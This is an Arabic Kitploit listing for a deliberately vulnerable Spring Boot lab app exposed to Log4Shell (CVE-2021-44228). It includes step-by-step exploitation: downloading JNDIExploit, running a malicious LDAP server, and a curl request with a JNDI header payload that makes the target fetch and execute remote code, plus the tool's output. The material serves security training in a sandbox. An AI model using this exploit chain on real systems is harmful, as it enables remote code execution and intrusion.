Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4shell-vulnerable-app — تطبيق ويب Spring Boot معرّض لثغرة Log4Shell (CVE-2021-44228). | Kitploit
أدوات/GitHubGitHub/prmawyer/log4shell-vulnerable-app
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubprmawyer/log4shell-vulnerable-app

log4shell-vulnerable-app

تطبيق ويب Spring Boot معرّض لثغرة Log4Shell (CVE-2021-44228).

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تطبيق نموذجي قابل للاستغلال بثغرة Log4Shell (CVE-2021-44228) - تم تعديله مرتين

يحتوي هذا المستودع على تطبيق ويب مبني على Spring Boot وهو قابل للاستغلال عبر الثغرة CVE-2021-44228، التي عُرفت باسم Log4Shell.

يستخدم التطبيق Log4j 2.14.1 (عبر spring-boot-starter-log4j2 2.6.1) و JDK 1.8.0_181.

تشغيل التطبيق

قم بتشغيله:

root@kitploit:~
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929

خطوات الاستغلال

ملاحظة: هذا المحتوى مستوحى إلى حد كبير من نشرة LunaSec الأصلية. نفّذ التجربة على مسؤوليتك الخاصة، ويفضَّل استخدام جهاز افتراضي (VM) في بيئة معزولة (sandbox).

تحديث (13 ديسمبر): تمت إزالة مستودع JNDIExploit من GitHub (ويُرجَّح أن الإزالة )... لتنزيل النسخة المخزنة مؤقتًا بواسطة Wayback Machine.

لم تكن بواسطة GitHub
انقر هنا
  • استخدم JNDIExploit لتشغيل خادم LDAP خبيث
root@kitploit:~
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
  • ثم قم بتشغيل الاستغلال باستخدام:
root@kitploit:~
# will execute 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
  • لاحظ مخرجات JNDIExploit، حيث تُظهر أنها أرسلت استجابة LDAP خبيثة وقدمت الحمولة (payload) الخاصة بالمرحلة الثانية:
root@kitploit:~
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119  /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200
  • للتأكد من نجاح تنفيذ الأوامر، لاحظ أن الملف /tmp/pwned.txt قد أُنشئ داخل الحاوية التي تشغّل التطبيق القابل للاستغلال:
root@kitploit:~
$ docker exec vulnerable-app ls /tmp
...
pwned
...

المراجع

https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

المساهمون

@christophetd @rayhan0x01

تنزيل الأداة